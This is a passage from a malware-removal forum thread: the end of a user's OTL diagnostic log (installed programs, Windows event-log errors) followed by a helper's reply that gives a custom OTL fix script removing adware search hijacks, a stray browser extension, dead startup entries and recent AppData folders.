"{E9E34215-82EF-4909-BE2F-F581F0DC9062}" = DirectX for Managed Code Update (Summer 2004)
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{FB4BB287-37F9-4E27-9C4D-2D3882E08EFF}" = DVD Menu Pack for HP MediaSmart Video
"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials
"{FE23D063-934D-4829-A0D8-00634CE79B4A}" = Adobe AIR
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"Adobe AIR" = Adobe AIR
"Adobe Creative Cloud" = Adobe Creative Cloud
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 13 Plugin
"Adobe Photoshop Elements 12" = Adobe Photoshop Elements 12
"AliSetup" = AliSetup 0.1.0.52
"Any Video Converter_is1" = Any Video Converter 3.5.8
"com.adobe.downloadassistant.AdobeDownloadAssistant" = Adobe Download Assistant
"Deal Ply Removal Tool_is1" = Deal Ply Removal Tool
"DVD Flick_is1" = DVD Flick 1.3.0.7
"ENTERPRISE" = Microsoft Office Enterprise 2007
"HP Remote Solution" = HP Remote Solution
"InstallConverter" = InstallConverter
"InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}" = CyberLink DVD Suite Deluxe
"InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}" = Movie Theme Pack for HP MediaSmart Video
"InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}" = Power2Go
"InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}" = HP MediaSmart Music/Photo/Video
"InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}" = LabelPrint
"InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}" = PowerDirector
"InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}" = HP MediaSmart DVD
"InstallShield_{FB4BB287-37F9-4E27-9C4D-2D3882E08EFF}" = DVD Menu Pack for HP MediaSmart Video
"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware version 2.0.4.1028
"Microsoft Visual Studio 2005 Tools for Applications - ENU" = Microsoft Visual Studio 2005 Tools for Applications - ENU
"Mozilla Firefox 34.0.5 (x86 en-US)" = Mozilla Firefox 34.0.5 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Revo Uninstaller" = Revo Uninstaller 1.95
"SolidWorks Installation Manager 20110-40200-1100-100" = SolidWorks 2011 x64 Edition SP02
"TradeManager" = TradeManager 2013 Beta2
"TradeManager 2011 SP2" = TradeManager 2011 SP2
"Tweaking.com - Registry Backup" = Tweaking.com - Registry Backup
"WildTangent hp Master Uninstall" = HP Games
"WinLiveSuite" = Windows Live Essentials
"Zoom Downloader" = Zoom Downloader
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"036a0e4fc6a247ec" = MyHarmony
"Akamai" = Akamai NetSession Interface
"AliIM Plugins for Browser" = AliIM Plugins for Browser
"CDBurnerXP Free Download Packages" = CDBurnerXP Free Download Packages
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 24/12/2014 9:06:43 PM | Computer Name = BRIAN-PC | Source = Bonjour Service | ID = 100
Description = Client application bug: DNSServiceResolve(78:7e:61:50:32:1c@fe80::7a7e:61ff:fe50:321c._apple-mobdev2._tcp.local.)
 active for over two minutes. This places considerable burden on the network.
 
Error - 24/12/2014 9:46:25 PM | Computer Name = BRIAN-PC | Source = Application Error | ID = 1000
Description = Faulting application name: WDBackupEngine.exe, version: 2.0.0.15,
time stamp: 0x53cee30c  Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409,
 time stamp: 0x53159a86  Exception code: 0xc0000005  Fault offset: 0x0002eae4  Faulting
 process id: 0x9f4  Faulting application start time: 0x01d01fe3ae53526d  Faulting application
 path: C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe  Faulting
 module path: C:\Windows\syswow64\KERNELBASE.dll  Report Id: d55b8d9f-8bd7-11e4-91ec-e0cb4e7d728e
 
Error - 25/12/2014 4:00:05 AM | Computer Name = BRIAN-PC | Source = Windows Backup | ID = 4103
Description =
 
Error - 26/12/2014 1:28:44 AM | Computer Name = BRIAN-PC | Source = Application Hang | ID = 1002
Description = The program OTL(2).exe version 3.2.69.0 stopped interacting with Windows
 and was closed. To see if more information about the problem is available, check
 the problem history in the Action Center control panel.    Process ID: 212c    Start Time:
 01d020cc7d69dd30    Termination Time: 5    Application Path: C:\Users\BR\Downloads\OTL(2).exe

Report
 Id: 026ee8d9-8cc0-11e4-91ec-e0cb4e7d728e  
 
Error - 26/12/2014 4:00:05 AM | Computer Name = BRIAN-PC | Source = Windows Backup | ID = 4103
Description =
 
Error - 27/12/2014 4:00:06 AM | Computer Name = BRIAN-PC | Source = Windows Backup | ID = 4103
Description =
 
Error - 28/12/2014 4:00:05 AM | Computer Name = BRIAN-PC | Source = Windows Backup | ID = 4103
Description =
 
Error - 28/12/2014 4:30:14 AM | Computer Name = BRIAN-PC | Source = Bonjour Service | ID = 100
Description = Client application bug: DNSServiceResolve(78:7e:61:50:32:1c@fe80::7a7e:61ff:fe50:321c._apple-mobdev2._tcp.local.)
 active for over two minutes. This places considerable burden on the network.
 
Error - 29/12/2014 4:00:05 AM | Computer Name = BRIAN-PC | Source = Windows Backup | ID = 4103
Description =
 
Error - 29/12/2014 4:26:39 AM | Computer Name = BRIAN-PC | Source = Application Error | ID = 1000
Description = Faulting application name: hitsblender.exe, version: 0.0.0.0, time
 stamp: 0x54857f05  Faulting module name: Qt5WebKit.dll, version: 5.3.1.0, time stamp:
 0x53a2e0bb  Exception code: 0xc0000005  Fault offset: 0x005167d6  Faulting process id:
 0xe20  Faulting application start time: 0x01d01fe3dbdc050b  Faulting application path:
 C:\Program Files (x86)\HitsBlender\hitsblender.exe  Faulting module path: C:\Program
 Files (x86)\HitsBlender\Qt5WebKit.dll  Report Id: 687661f9-8f34-11e4-91ec-e0cb4e7d728e
 
Error - 30/12/2014 4:00:05 AM | Computer Name = BRIAN-PC | Source = Windows Backup | ID = 4103
Description =
 
[ Hewlett-Packard Events ]
Error - 13/06/2012 7:38:15 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 13/06/2012 11:10:06 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 13/06/2012 11:10:07 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 27/06/2012 7:40:33 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 27/06/2012 7:40:33 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 11/07/2012 7:56:06 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 11/07/2012 7:56:06 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 01/08/2012 7:08:43 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 01/08/2012 7:08:44 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
Error - 08/08/2012 7:41:26 PM | Computer Name = BRIAN-PC | Source = Hewlett-Packard | ID = 0
Description = en-CA Could not find file 'C:\Program Files (x86)\Hewlett-Packard\HP
 Support Framework\Logs\SystemInfoAA.xml'. mscorlib    at System.IO.__Error.WinIOError(Int32
 errorCode, String maybeFullPath)     at System.IO.FileStream.Init(String path, FileMode
 mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32
 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath,
Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode mode,
FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String
 msgPath, Boolean bFromProxy)     at System.IO.FileStream..ctor(String path, FileMode
 mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks,
 Int32 bufferSize)     at System.IO.StreamReader..ctor(String path, Encoding encoding)

   at System.IO.File.ReadAllText(String path, Encoding encoding)     at n.a(Object
 A_0, EventArgs A_1)
 
[ Media Center Events ]
Error - 21/10/2014 1:33:34 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:33:33 PM - Failed to retrieve SportsV2 (Error: Unable to connect
 to the remote server)  
 
Error - 21/10/2014 1:33:39 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:33:37 PM - Failed to retrieve Broadband (Error: Unable to connect
 to the remote server)  
 
Error - 22/10/2014 1:41:04 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:41:04 PM - Failed to retrieve MCEClientUX (Error: Unable to connect
 to the remote server)  
 
Error - 23/10/2014 1:41:33 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:41:33 PM - Failed to retrieve Directory (Error: Invalid security
 token.)  
 
Error - 23/10/2014 1:41:38 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:41:38 PM - Failed to retrieve MCEClientUX (Error: Unable to connect
 to the remote server)  
 
Error - 23/10/2014 1:41:42 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:41:40 PM - Failed to retrieve SportsV2 (Error: Unable to connect
 to the remote server)  
 
Error - 23/10/2014 1:41:46 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:41:45 PM - Failed to retrieve Broadband (Error: Unable to connect
 to the remote server)  
 
Error - 23/10/2014 2:42:24 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 11:42:22 PM - Failed to retrieve Broadband (Error: Unable to connect
 to the remote server)  
 
Error - 24/10/2014 1:49:09 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:49:09 PM - Failed to retrieve MCESpotlight (Error: Unable to connect
 to the remote server)  
 
Error - 24/10/2014 1:49:13 AM | Computer Name = BRIAN-PC | Source = MCUpdate | ID = 0
Description = 10:49:13 PM - Failed to retrieve SportsSchedule (Error: Unable to
connect to the remote server)  
 
[ System Events ]
Error - 24/12/2014 8:46:33 PM | Computer Name = BRIAN-PC | Source = Service Control Manager | ID = 7009
Description = A timeout was reached (30000 milliseconds) while waiting for the HP
 Support Solutions Framework Service service to connect.
 
Error - 24/12/2014 8:46:33 PM | Computer Name = BRIAN-PC | Source = Service Control Manager | ID = 7000
Description = The HP Support Solutions Framework Service service failed to start
 due to the following error:   %%1053
 
Error - 24/12/2014 8:46:33 PM | Computer Name = BRIAN-PC | Source = Service Control Manager | ID = 7000
Description = The LogMeIn Kernel Information Provider service failed to start due
 to the following error:   %%3
 
Error - 24/12/2014 8:47:00 PM | Computer Name = BRIAN-PC | Source = Service Control Manager | ID = 7026
Description = The following boot-start or system-start driver(s) failed to load:
   wpnfd_1_10_0_1
 
Error - 24/12/2014 8:49:20 PM | Computer Name = BRIAN-PC | Source = Service Control Manager | ID = 7000
Description = The Google Update Service (gupdate) service failed to start due to
 the following error:   %%2
 
Error - 24/12/2014 9:39:47 PM | Computer Name = BRIAN-PC | Source = Service Control Manager | ID = 7000
Description = The LogMeIn Kernel Information Provider service failed to start due
 to the following error:   %%3
 
Error - 24/12/2014 9:43:15 PM | Computer Name = BRIAN-PC | Source = Service Control Manager | ID = 7000
Description = The Google Update Service (gupdate) service failed to start due to
 the following error:   %%2
 
Error - 24/12/2014 9:46:33 PM | Computer Name = BRIAN-PC | Source = Service Control Manager | ID = 7031
Description = The WD Backup service terminated unexpectedly.  It has done this 1
 time(s).  The following corrective action will be taken in 0 milliseconds: Restart
 the service.
 
Error - 24/12/2014 9:48:12 PM | Computer Name = BRIAN-PC | Source = DCOM | ID = 10010
Description =
 
Error - 24/12/2014 9:53:28 PM | Computer Name = BRIAN-PC | Source = NetBT | ID = 4321
Description = The name "WORKGROUP      :1d" could not be registered on the interface
 with IP address 192.168.0.10.  The computer with the IP address 192.168.0.15 did
not allow the name to be claimed by  this computer.
 
 
< End of report >
 


Edited by RUSTY2, 30 December 2014 - 02:02 PM.

  • 0

#6
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Thank you for the logs. Let me know how your machine is doing after this.
 
Step#1 - Warnings
I see that you have CCleaner installed. This is indeed a good product but I wanted to caution you on running the registry cleaning functionality of the tool. Please avoid this as it can do more harm than good.
 
Step#2 - OTL Fix
1. Right click on OTL.exe and choose Run as administrator.
2. Copy all the code below and paste it into the Custom Scans/Fixes section at the very bottom of the OTL program. Do NOT include the word Quote.
 
 

:Commands
[CreateRestorePoint]
 
:OTL
IE:64bit: - HKLM\..\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}: "URL" = http://astromenda.co....=1701220253=
IE:64bit: - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
IE - HKCU\..\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}: "URL" = http://astromenda.co....=1701220253=
IE - HKCU\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
FF - prefs.js..browser.search.order.1: "default-search.net"
FF - prefs.js..extensions.enabledAddons: %7B6e7f6f9f-8ce6-4611-add2-05f0f7049ee6%7D:1.10.0.1
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}: C:\Program Files (x86)\Mozilla Firefox\extensions\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}
CHR - Extension: No name found = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana\1.0\
O3:64bit: - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O4 - HKLM..\Run: []  File not found
O4 - HKLM..\Run: [mobilegeni daemon] C:\Program Files (x86)\Mobogenie\DaemonProcess.exe File not found
O4 - HKCU..\Run: [052B6A76D3592F59F21802FFF2A3D98838477D09._service_run] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=service File not found
[2014/12/30 10:08:28 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{161EA2E7-1A2F-48C2-A791-C4E958323664}
[2014/12/29 13:32:08 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{C0BA43A4-9C39-49CD-A803-0174513E7C00}
[2014/12/28 06:36:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{016D6421-1701-49DF-8B52-7F6D4D653389}
[2014/12/27 11:37:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{AF92B2FA-5ED5-408A-9B43-0CBB91604675}
[2014/12/26 11:27:37 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{4F520A6F-5EA8-4BEA-81F9-B213BAD2FB51}
[2014/12/26 05:18:33 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BB9A289D-82F3-4D81-8BCA-37F8290221F8}
[2014/12/25 08:23:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{36ECD5BF-2A83-4EA1-9F2A-1372D52EC2F1}
[2014/12/24 16:15:26 | 000,000,000 | ---D | C] -- C:\ProgramData\436c0126c213f27c
[2014/12/24 16:15:15 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Chromatic Browser
[2014/12/24 16:15:14 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Torch
[2014/12/24 16:15:13 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Comodo
[2014/12/24 10:23:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D1D4E566-89C5-4661-8587-D6DA3F967427}
[2014/12/23 14:38:57 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E77F53AB-5CFA-4331-956C-89F6A49FE417}
[2014/12/23 01:33:07 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BCCE8D52-2930-4318-9A56-A0EE74801811}
[2014/12/22 22:26:12 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F6ACB3ED-A8EB-4261-A125-679BE2200DF1}
[2014/12/22 10:12:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{2316A05D-D4E2-4776-AAA8-C916225F95B1}
[2014/12/22 09:30:52 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{44FA6A8F-D05A-4E14-A8A4-9E824AB036DE}
[2014/12/21 09:09:44 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{328853B6-F344-46E7-811C-47AA890B1249}
[2014/12/20 10:05:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F2C52649-44F5-467B-8A99-E251AEF10909}
[2014/12/20 03:04:01 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{0B6787CF-D8C6-48D0-897B-33F9B1773BAD}
[2014/12/19 10:27:51 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F09B2DFA-DA99-4A9B-97BD-721FCC82C682}
[2014/12/18 10:14:34 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{40FB4ED4-C216-45AB-A934-9A01052FF0A6}
[2014/12/17 11:42:30 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{6C252B3B-90AF-477B-8B9B-C3CB6A4240B8}
[2014/12/16 21:00:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{486DC693-CB7F-4A9C-AB4C-119EAEAD3EA2}
[2014/12/16 08:48:31 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BD179AF9-9327-4607-BA8F-2E09D6442B43}
[2014/12/15 19:40:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{3EC3E9E4-4CEC-4EE4-B929-B6DB842B7DF2}
[2014/12/15 07:38:11 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{95F1AFE4-66B6-4106-AF1F-E3E11FFB541D}
[2014/12/14 09:56:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{097310BC-264E-423E-BBE6-3C0984A7526F}
[2014/12/13 14:39:24 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8DF0A1ED-2752-4C1B-9961-B4961D9AB7C4}
[2014/12/13 09:25:26 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{A7A4483E-D295-4DEC-9ECA-9BAA997A158C}
[2014/12/12 17:10:22 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F42EF7D8-6D04-4744-85A2-68D0885DE588}
[2014/12/12 10:15:52 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{92389730-EE55-458F-9993-0CC5EAE8DD72}
[2014/12/11 10:53:42 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{5181130D-474C-41A2-B058-1F81726AC940}
[2014/12/10 16:46:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{5BD4D736-C10B-4BC1-A66A-B22E90D4FF9E}
[2014/12/10 15:45:48 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{C3324AE5-1973-450C-9049-BA3B1DDA1F65}
[2014/12/09 22:31:33 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D744513F-8905-44B3-AFE8-FBD8F082E66C}
[2014/12/09 08:38:40 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8745E557-E33E-47E5-80C3-B14966613146}
[2014/12/08 15:39:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E7494A2A-69FF-408C-9493-855166F661D5}
[2014/12/07 23:10:51 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{37789C42-330D-4A1B-8B9F-2A2B553ACC0E}
[2014/12/07 23:09:55 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{04F5D5DE-4566-41A0-9560-4296D7568CE6}
